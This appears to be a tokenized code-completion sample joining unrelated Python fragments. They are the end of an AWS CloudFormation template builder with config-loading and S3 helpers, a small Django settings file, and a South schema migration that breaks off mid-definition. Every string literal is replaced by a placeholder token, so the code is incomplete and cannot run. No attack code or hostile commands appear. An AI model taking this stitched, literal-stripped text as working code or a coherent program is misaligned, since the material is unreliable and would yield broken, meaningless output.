Resource ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> core . Properties ( { <EOL> '<STR_LIT>' : config [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : functions . base64 ( user_data_script ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : functions . ref ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : instance_tags , <EOL> } ) <EOL> ) <EOL> cft . resources . instance_profile = core . Resource ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> core . Properties ( { <EOL> '<STR_LIT>' : '<STR_LIT:/>' , <EOL> '<STR_LIT>' : [ <EOL> functions . ref ( '<STR_LIT>' ) <EOL> ] <EOL> } ) <EOL> ) <EOL> cft . resources . web_role = core . Resource ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> core . Properties ( { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] <EOL> } , <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] <EOL> } ] <EOL> } , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> '<STR_LIT>' : '<STR_LIT:/>' , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> "<STR_LIT>" <EOL> ] , <EOL> "<STR_LIT>" : [ <EOL> "<STR_LIT:*>" <EOL> ] <EOL> } <EOL> ] <EOL> } <EOL> } , <EOL> { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> "<STR_LIT>" <EOL> ] , <EOL> "<STR_LIT>" : "<STR_LIT:*>" <EOL> } <EOL> ] <EOL> } <EOL> } <EOL> ] <EOL> } ) <EOL> ) <EOL> cft . resources . smtp_user = core . Resource ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> core . 
Properties ( { <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:*>" <EOL> } ] <EOL> } <EOL> } ] <EOL> } ) <EOL> ) <EOL> cft . resources . mount = core . Resource ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> core . Properties ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : functions . ref ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : config [ '<STR_LIT>' ] <EOL> } ) <EOL> ) <EOL> print ( str ( cft ) ) <EOL> def load_config ( ) : <EOL> """<STR_LIT>""" <EOL> config_dir = "<STR_LIT>" <EOL> pattern = os . path . join ( config_dir , "<STR_LIT>" ) <EOL> config = { } <EOL> for config_filename in sorted ( glob . glob ( pattern ) ) : <EOL> with open ( config_filename ) as f : <EOL> y = yaml . load ( f ) <EOL> if y : <EOL> config . update ( y ) <EOL> required = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> bad = [ ] <EOL> for key in required : <EOL> if key not in config : <EOL> bad . append ( key ) <EOL> if bad : <EOL> sys . stderr . write ( "<STR_LIT>" . format ( <EOL> config_dir , bad ) ) <EOL> raise ConfigError ( ) <EOL> config . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> config . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return config <EOL> def save_s3_config ( config , suffix ) : <EOL> """<STR_LIT>""" <EOL> s3 = boto3 . resource ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in config : <EOL> bucket_name = '<STR_LIT>' + random_alnum ( <NUM_LIT> ) <EOL> s3 . create_bucket ( Bucket = bucket_name ) <EOL> s3_config = dict ( S3_CONFIG_BUCKET = bucket_name ) <EOL> with open ( '<STR_LIT>' , '<STR_LIT:w>' ) as o : <EOL> o . write ( "<STR_LIT>" ) <EOL> yaml . dump ( s3_config , stream = o ) <EOL> config . update ( s3_config ) <EOL> bucket_name = config [ '<STR_LIT>' ] <EOL> object_name = ( "<STR_LIT>" + suffix ) <EOL> s3_uri = "<STR_LIT>" . 
format ( bucket_name , object_name ) <EOL> config [ '<STR_LIT>' ] = s3_uri <EOL> s3_object = s3 . Object ( bucket_name , object_name ) <EOL> s3_object . put ( Body = json . dumps ( config , indent = <NUM_LIT:2> ) ) <EOL> return s3_uri <EOL> def random_alnum ( n ) : <EOL> """<STR_LIT>""" <EOL> import random <EOL> import string <EOL> return '<STR_LIT>' . join ( <EOL> random . choice ( string . ascii_lowercase + string . digits ) <EOL> for _ in range ( n ) ) <EOL> def derive_config ( config ) : <EOL> """<STR_LIT>""" <EOL> ec2 = boto3 . resource ( '<STR_LIT>' ) <EOL> volume = ec2 . Volume ( config [ '<STR_LIT>' ] ) <EOL> az = volume . availability_zone <EOL> if '<STR_LIT>' in config : <EOL> assert config [ '<STR_LIT>' ] == az <EOL> config [ '<STR_LIT>' ] = az <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . exit ( main ( ) ) </s>
from .dev import *

# Static asset directories searched in addition to app static/ folders,
# both rooted at BASE_DIR.  (os and BASE_DIR come in via the star import
# from the dev settings module.)
STATICFILES_DIRS = tuple(
    os.path.join(BASE_DIR, _static_dir)
    for _static_dir in ("<STR_LIT>", "<STR_LIT>")
)
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . delete_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . create_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> 
'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( 
'<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , 
'<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:3>' } ) , <EOL> '<STR_LIT:filename>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( 
'<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : 
'<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : 
'<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:message>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:version>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:type>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { 
